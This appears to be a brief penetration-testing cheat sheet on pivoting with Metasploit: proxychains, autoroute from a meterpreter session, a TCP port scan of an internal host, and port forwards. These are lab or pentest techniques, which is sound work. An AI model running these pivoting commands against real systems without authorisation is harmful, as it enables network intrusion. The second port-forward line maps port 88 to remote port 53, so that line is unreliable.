Metasploit

Get chisel, proxy chains setup, launch metasploit and obtain a meterpreter session

proxychains msfconsole

Route traffic to new network

meterpreter > run autoroute -s 172.16.2.0/24
meterpreter > bg

Scan target

use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.2.5
set THREADS 10
run

Port Forward

portfwd add -L 127.0.0.1 -l 53 -p 53 -r 172.16.2.5
portfwd add -L 127.0.0.1 -l 88 -p 53 -r 172.16.2.5

Last updated